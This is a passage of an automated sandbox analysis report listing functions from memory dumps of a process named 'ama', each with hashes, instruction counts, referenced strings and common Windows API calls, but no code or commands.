Instruction ID: 3a494b3a1de424a9cfdfb0ab55ccb06e3a25324918df4dadaf02e00eaa3eff9d
Opcode Fuzzy Hash: a0c059c38a171359a763e0975228948089166327798ae47abb82c9ec5b9daf56
Instruction Fuzzy Hash: 31A1D6B4E00319CFDB24DFA5D854B9EBBB2BF89304F1085A9D409AB365DB305A85CF52

Function 06915098 Relevance: 1.9, Strings: 1, Instructions: 641
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 0691548B

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: c8241ec8fde48935609372e2813dd7448f8cc0ebead3dc9e41bded6cca3779b9
Instruction ID: 12f9c833f2eda875a6e5c31337c322ff89bde59be9dcd6e6d997b13f59c79730
Opcode Fuzzy Hash: c8241ec8fde48935609372e2813dd7448f8cc0ebead3dc9e41bded6cca3779b9
Instruction Fuzzy Hash: D7425DB1E04269CFDB54CF65C8407EDFBB2BF85300F2685AAD449AB241DB749A85CF90

Function 077728C8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

$]q, xrefs: 07772A7C

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: 54780ce3a5a73a4706c1638d4a228e9731e970d4c4bc7b3e28ffa8783ae6790e
Instruction ID: 3365071097292567d6f6769f57cab877e69bf65bccc2b3adadb9e53485ba4597
Opcode Fuzzy Hash: 54780ce3a5a73a4706c1638d4a228e9731e970d4c4bc7b3e28ffa8783ae6790e
Instruction Fuzzy Hash: 5C71D2B4E01219CFDF18DFA9D884AADBBB2BF89340F209529D415AB355DB349846CF44

Function 06917DF0 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e9b8e4c71f0a70273055a4ce3221903976128cfb20b628e59f8bd8280a9de0
Instruction ID: 741bc56246b4f84c68e81a38bfbbe61662d61dcc87d9a6b83ffc3bac2c83bad7
Opcode Fuzzy Hash: 82e9b8e4c71f0a70273055a4ce3221903976128cfb20b628e59f8bd8280a9de0
Instruction Fuzzy Hash: 9E02D274A01229CFDB64DF64C990B9EBBB2BF89300F1085E9D409AB355DB34AE85CF51

Function 069136F0 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59867c522a0bf206dd21800a9a894306044118232fc5180269f8b9cddb705c8f
Instruction ID: 8f9fdcf7559c11ce07286cc9c575206c95e1e5c55bd39751c604e21491ae29ab
Opcode Fuzzy Hash: 59867c522a0bf206dd21800a9a894306044118232fc5180269f8b9cddb705c8f
Instruction Fuzzy Hash: E3F19E74E01228CFDB64DF65C984BADBBB2BF49301F2095AAD409AB350DB355E85CF50

Function 06913EC8 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f636277b2e73bb99ed1d5a07cd934618f6f82ba8c87f38e301837800c834e28
Instruction ID: 3c77054b7a4b993c5a093af21dcec3a8efbc06212fd4adcb784fa3cdc7a402d2
Opcode Fuzzy Hash: 1f636277b2e73bb99ed1d5a07cd934618f6f82ba8c87f38e301837800c834e28
Instruction Fuzzy Hash: 4CE19070E00228CFDB64DFA5C990BDEBBB2BF49300F6085AAD549AB251DB345E85CF50

Function 06915ED8 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e0149ca2ec40246524842df82f4db8f501c167d8522a0060565776e5d05af0
Instruction ID: f9e8182546416e8292a316b795c780143d8c5f19d30ddad0a349f0e0428e1c40
Opcode Fuzzy Hash: a8e0149ca2ec40246524842df82f4db8f501c167d8522a0060565776e5d05af0
Instruction Fuzzy Hash: 32E1D274E00229CFDB64DF65C994BADBBB2BF89304F2085A9D409AB351DB305E85CF51

Function 06917988 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e8f5b95248360fd21159c26206b016b8d8203e0b2639dac71a6b65cdf2448e
Instruction ID: 8a321f1b9ad8810c36311add86d092461d00a7a7e395bd6d19e8903883fa62dc
Opcode Fuzzy Hash: 24e8f5b95248360fd21159c26206b016b8d8203e0b2639dac71a6b65cdf2448e
Instruction Fuzzy Hash: 51D18074E01219CFDB54CFA9D984B9DBBB2BF49300F2091AAD409AB355DB309D85CF50

Function 069127C8 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9a27d44c52260453c8629290d3676246bdbfcfcadd2c0df90bfc7e67d5d455
Instruction ID: b003525b9d64604f801af1a6a0ee7bc4da10ba60c4629950c80d2f09c0b7e721
Opcode Fuzzy Hash: 5d9a27d44c52260453c8629290d3676246bdbfcfcadd2c0df90bfc7e67d5d455
Instruction Fuzzy Hash: 17C1A174E012189FDB44DFA9D594AEEBBF2FF88300F209069E905AB355DB349A41CF54

Function 069127B7 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d26ed0cc8353483aa3d21adf80297f8977467e7558762b8944f8dd2c92c2bc9a
Instruction ID: 1bc6c82d690249ef49db2e3ed1782d060b0395b1fb25e63a6506a1981e739999
Opcode Fuzzy Hash: d26ed0cc8353483aa3d21adf80297f8977467e7558762b8944f8dd2c92c2bc9a
Instruction Fuzzy Hash: 29A1B074E022089FDB44DFA9D994AEEBBF2FF89300F209069E404AB351DB349A45CF50

Function 06914520 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce1782d123a29ece5967f65aed4d2406778ee0f6cac27ef7fbc9492b96c7e67a
Instruction ID: 6734da552fc8a85323a5509cda064d8a9b8ed5e6c196dbf12dc102c0ef663d7a
Opcode Fuzzy Hash: ce1782d123a29ece5967f65aed4d2406778ee0f6cac27ef7fbc9492b96c7e67a
Instruction Fuzzy Hash: 89B1CE74E01218CFDB68DFA5C984BDDBBB2BF89304F2094A9D409AB255DB355E86CF40

Function 069149A0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4086dcb8c8663abc33f9aefb9e2660a9748f1e3092aaa7a0bcc5a96473963f64
Instruction ID: dfa3512bd54eb3410426d18803a4e1609a252dd8137cc1e7da96b49426240378
Opcode Fuzzy Hash: 4086dcb8c8663abc33f9aefb9e2660a9748f1e3092aaa7a0bcc5a96473963f64
Instruction Fuzzy Hash: 34A1CD74E01218CFDB54DFA9D884A9DBBF2FF8A304F2090A9D409AB355DB319986CF40

Function 069171D0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504a52b389799e406733c05971f1149689996da8c3d25fe8b87117fe8ed79f79
Instruction ID: 5c9556e7374844a0de3a79e1e773212ecf3d5eb571bb41cca2e1a84e1ada9ee1
Opcode Fuzzy Hash: 504a52b389799e406733c05971f1149689996da8c3d25fe8b87117fe8ed79f79
Instruction Fuzzy Hash: AA51F4B1E01209CFDB18DFA6C9546EEFBF2BF89300F24856AD415AB294DB345A42CF50

Function 025BD0A8 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025BD136
GetCurrentThread.KERNEL32 ref: 025BD173
GetCurrentProcess.KERNEL32 ref: 025BD1B0
GetCurrentThreadId.KERNEL32 ref: 025BD209

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3fcf3b82d603ab8adf9fe201d6e0af49343d50b33eea13e1d69e6fe2a944e964
Instruction ID: 3ab9319529958f0b31be24d52fa95ed89c318d81be4b91d86c2630b90365de59
Opcode Fuzzy Hash: 3fcf3b82d603ab8adf9fe201d6e0af49343d50b33eea13e1d69e6fe2a944e964
Instruction Fuzzy Hash: F75168B09012498FDB45DFA9D948BDEBBF1FF48304F208459E519A7360D7389944CB69

Function 025BD0B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 025BD136
GetCurrentThread.KERNEL32 ref: 025BD173
GetCurrentProcess.KERNEL32 ref: 025BD1B0
GetCurrentThreadId.KERNEL32 ref: 025BD209

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 00b546db6a06337e1c39f22f807fad1564fbbc476b9e55bafa05cf713c478ca5
Instruction ID: 18d017ce9ee0c9a03c3f6143c04cc13c1cb34a62cce2af22a71012a6c840e6c7
Opcode Fuzzy Hash: 00b546db6a06337e1c39f22f807fad1564fbbc476b9e55bafa05cf713c478ca5
Instruction Fuzzy Hash: 575178B09012498FDB04DFAAD948BDEBBF5FF48304F208459E419A7360C738A944CF69

Function 06915A04 Relevance: 2.7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06915AD2
$]q, xrefs: 06915A84

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 6831946ce451e321913879e1df057eb8bc6f8dceae18795d5847d4cdf4382c15
Instruction ID: 6163aaf42a3c6f05aa057dd75fe2ede18f5c0090f64197a9d4272226ed9b3903
Opcode Fuzzy Hash: 6831946ce451e321913879e1df057eb8bc6f8dceae18795d5847d4cdf4382c15
Instruction Fuzzy Hash: 968104B5E0031CAFDF14CF98C894ADEBFB9BF88314F258519E505AB240DB74A984CB91

Function 06915A10 Relevance: 2.7, Strings: 2, Instructions: 169
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06915AD2
$]q, xrefs: 06915A84

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 872cad51b492f47cc2537ae0bee2ffd22d02028510714f45b0ecce210322c938
Instruction ID: 232d50222391b55beb84c55c97ab172005cf79e9d4a633c5ccba740535c361ff
Opcode Fuzzy Hash: 872cad51b492f47cc2537ae0bee2ffd22d02028510714f45b0ecce210322c938
Instruction Fuzzy Hash: EB6116B4E0031CAFDF14CF98C894ADEBFB9BF88310F158919E505AB240DB74A984CB91

Function 025BAE30 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 025BB086

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4e924c0c59aaaf88880a5034e969b9f96ccd5702079d808e58856fe45b8f6779
Instruction ID: 3bffff8447a0d844cb8e1d5ca34d22da7baf971d742192980518de2ac23c8dd9
Opcode Fuzzy Hash: 4e924c0c59aaaf88880a5034e969b9f96ccd5702079d808e58856fe45b8f6779
Instruction Fuzzy Hash: C47138B0A00B058FDB25DF29D5447AABBF6FF88304F00892DE48AD7A50D775E949CB94

Function 025B5935 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 025B59F1

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e4861c3c668530967f1a4390619bb64129f7ac44c12d7f0ae40bea21fd5e33df
Instruction ID: 854462b71f0ace8c73f5dbc4dc0becc8f216bda183f4f54bd1f33494cae5ab4e
Opcode Fuzzy Hash: e4861c3c668530967f1a4390619bb64129f7ac44c12d7f0ae40bea21fd5e33df
Instruction Fuzzy Hash: BF41E0B0D00619CADB29DFA9C8847DDBBB6BF49304F20806AD418BB254DB75694ACF91

Function 025B4248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 025B59F1

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: accb79301980e182238c381a258685b592e6430af0e822be008c1b59c804d217
Instruction ID: ec7359a1964f5a1b67fb65e58e5177b0218ede44729b4dece61b5e2d89173bcf
Opcode Fuzzy Hash: accb79301980e182238c381a258685b592e6430af0e822be008c1b59c804d217
Instruction Fuzzy Hash: 154104B0D00619CBDB25CFA9C844BDDBBB5FF49304F10806AD418BB250D775694ACF90

Function 025BD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD387

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5aeccd435ae887b9b106aab6d28ac6b127b3eac9abac67fd9ec55c268ca663ac
Instruction ID: c19d786c93ea286bcb6b86a9b8a18b39a857ae2710782de24ef632b455116df0
Opcode Fuzzy Hash: 5aeccd435ae887b9b106aab6d28ac6b127b3eac9abac67fd9ec55c268ca663ac
Instruction Fuzzy Hash: 5A21E4B59002089FDB10CF9AD984ADEBFF9FF48310F14845AE918A3310C378A940CFA5

Function 025BD2F9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025BD387

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fecf59bb808659c4e62a3fe2055759e158735387606273501361ab7938bf4efb
Instruction ID: fb9f666ed921e800abf275f048cba7e9a44330306a5cd7c95a0d45677bd0c6fd
Opcode Fuzzy Hash: fecf59bb808659c4e62a3fe2055759e158735387606273501361ab7938bf4efb
Instruction Fuzzy Hash: 5F21F3B5901209DFDB10CFAAD584AEEBBF5FF48310F14845AE918A3350D378A954CFA5

Function 025BB2A0 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,025BB101,00000800,00000000,00000000), ref: 025BB312

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9d60f87c9d578ae158b912eff384cafcf107cad333c9a12e3375ce4066e5d71b
Instruction ID: 8277c0f94b06c2d5d0e2fcda06e189f50fa163200313ec8e5338c94395cf4d96
Opcode Fuzzy Hash: 9d60f87c9d578ae158b912eff384cafcf107cad333c9a12e3375ce4066e5d71b
Instruction Fuzzy Hash: 3C1103B69002498FDB10CFAAC844ADEFBF5FF48314F10842AD829A7600C379A545CFA5

Function 025BA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,025BB101,00000800,00000000,00000000), ref: 025BB312

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a4bcc9c6c412dc68101352a05f4596064b89f02025fce3e5931f39be05ff8b46
Instruction ID: cc5373415fcffd803dee0e15cd556e996b544fe30139ff36986fdb168eb3ef94
Opcode Fuzzy Hash: a4bcc9c6c412dc68101352a05f4596064b89f02025fce3e5931f39be05ff8b46
Instruction Fuzzy Hash: 0711D3B6D002499FDB10DF9AC844ADEFBF9FF48314F10846AD919A7200C3B9A545CFA5

Function 0777B638 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0777B69D

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: f49c9bfd597763c48e3257381048900c0e123428954ec52a7c37dcea6ddd009d
Instruction ID: 5129d0bcdbcf907a7ecafc5e5123beeb02b7b204a621b763063c294b2bceb484
Opcode Fuzzy Hash: f49c9bfd597763c48e3257381048900c0e123428954ec52a7c37dcea6ddd009d
Instruction Fuzzy Hash: 791155B58003489FDB10DF99C844BEEFFF8EB08324F208859E558A3240C379A540CFA5

Function 0777AFA0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0777B69D

Memory Dump Source

Source File: 00000004.00000002.2406687762.0000000007770000.00000040.00000800.00020000.00000000.sdmp, Offset: 07770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7770000_ama.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ab780c98ba3fbf797479783f860c65b3173a4a0e63856e7c1432334213f27418
Instruction ID: 652b6662e86a264a0317422d36267d08e71e46cfa1eea762cc14c2ff155c77f9
Opcode Fuzzy Hash: ab780c98ba3fbf797479783f860c65b3173a4a0e63856e7c1432334213f27418
Instruction Fuzzy Hash: 051106B58003499FDB10DF9AC844BDEBBF8FB48314F108859E618A7210C379A944CFA5

Function 025BB020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 025BB086

Memory Dump Source

Source File: 00000004.00000002.2393450118.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25b0000_ama.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9ff76770a9484ebff9d43e8332e42a5fba984ce2a389d8a4ce1e0d0c212ba364
Instruction ID: 62b421cc0f989e92a79fd8fb6bb42974529a69a539debd0fdb6eb81a5c16bfa0
Opcode Fuzzy Hash: 9ff76770a9484ebff9d43e8332e42a5fba984ce2a389d8a4ce1e0d0c212ba364
Instruction Fuzzy Hash: 5611D2B5C007498FCB10DF9AC844AEEFBF5BF49314F10845AD869A7610C379A545CFA5

Function 06918448 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b58a1cf045b3392611e012b0f9b3ef468b655af857f44ace405a9f472633780
Instruction ID: 8f5cf528f19d79f86d4ce24c412e58bde2a567d8d7046640ae086536d4840b75
Opcode Fuzzy Hash: 0b58a1cf045b3392611e012b0f9b3ef468b655af857f44ace405a9f472633780
Instruction Fuzzy Hash: 13919F74A01228CFCBA4DF64C994ADEB7B2BF4A301F6085E9D40DAB251DB319E85CF41

Function 06919E50 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ee0cbd2f80a3898e370f92c3c75b2d6896259ab57336ee18986a11ce60904f
Instruction ID: 63dd7b75f0cf10c437c402ed1122fc5efe8ee46d527a14a61aa3d5163e6954e0
Opcode Fuzzy Hash: 45ee0cbd2f80a3898e370f92c3c75b2d6896259ab57336ee18986a11ce60904f
Instruction Fuzzy Hash: 9741C631A093858FCB06CF79D8505DABFB5FF86310B14829BE444EB296D334D915CBA1

Function 06914E28 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e50c2a64eaaf54c953c6dc814690008e5cc82afbcef7800103597c843fa86dc
Instruction ID: 8dbdabab257d9c20ea0af446e0d5e1112125db7506b64ec2c2f050a2eaff8cc4
Opcode Fuzzy Hash: 0e50c2a64eaaf54c953c6dc814690008e5cc82afbcef7800103597c843fa86dc
Instruction Fuzzy Hash: 20518D74D01219CFEB54DFA6D8487EDBBF1BB48311F24852AE425AB390D7780A85CF50

Function 06917DE0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa229e89f23260ede6a74f29892decf1b2aad83aa6300f91fcdeae2565938bbd
Instruction ID: 0c39571c3144e4975089edbb01261f2ef068b147c8afc172eb377fefdb76435c
Opcode Fuzzy Hash: fa229e89f23260ede6a74f29892decf1b2aad83aa6300f91fcdeae2565938bbd
Instruction Fuzzy Hash: A6518930A01229CFEB14DF64D814BAEBBB6FF88300F1089A9D80867395DB355A85CF55

Function 0691A8A8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c0f67e98ad1ce420a7d08adaeeead9fbd692cd79290d4976dbd600b5c721d6
Instruction ID: d010922c17dc6074aedc396a6e9209ed9aef0828b04d8d8ed30d1522cfd75c1a
Opcode Fuzzy Hash: 61c0f67e98ad1ce420a7d08adaeeead9fbd692cd79290d4976dbd600b5c721d6
Instruction Fuzzy Hash: 9141E374D113088FDB45EFA4D944ADDBBB2EF8A300F208629E406BB664EB345949CB50

Function 0691A8B8 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eed6c2e11fa11febef12412023c1528691c93e365a2383ffe862fe8eecd679f
Instruction ID: 4224e977a4fbaa5ab784ccae405583f765529635fcec4d7f0fb57ef4f3129d0c
Opcode Fuzzy Hash: 8eed6c2e11fa11febef12412023c1528691c93e365a2383ffe862fe8eecd679f
Instruction Fuzzy Hash: 0841E274D1130C8BDB45EFA5D954ADDBBB2FF8A300F208629E406BB264EB745989CB50

Function 06915C65 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42af7a13398de4ab299f04f3861a56fb3c277a6ada72ca0505cdd4567bfda57a
Instruction ID: 03b2eec33bc135de9dbc33f902499793aab3fd00b81dfbb42f6349aba05058ca
Opcode Fuzzy Hash: 42af7a13398de4ab299f04f3861a56fb3c277a6ada72ca0505cdd4567bfda57a
Instruction Fuzzy Hash: B341D2B4D00348AFCB00DF99C984ADEBFF9BF48710F21851AE919AB250DB74A945CF94

Function 06914E1B Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7269f82daac0a3b6e73a04f87192df5f22a2ebe5868275a45d7fb256d14afd4f
Instruction ID: 7ace56190950375531a06bafb3c594acaeb6b28ba52e48d9a461627ae979e8d2
Opcode Fuzzy Hash: 7269f82daac0a3b6e73a04f87192df5f22a2ebe5868275a45d7fb256d14afd4f
Instruction Fuzzy Hash: F441BFB0D0126D8FDB54DFA5C8083EDBBF1BF89701F24852AD025AB690D7780A45CF80

Function 06915C70 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2405118683.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6910000_ama.jbxd

Similarity

API ID:
String ID:
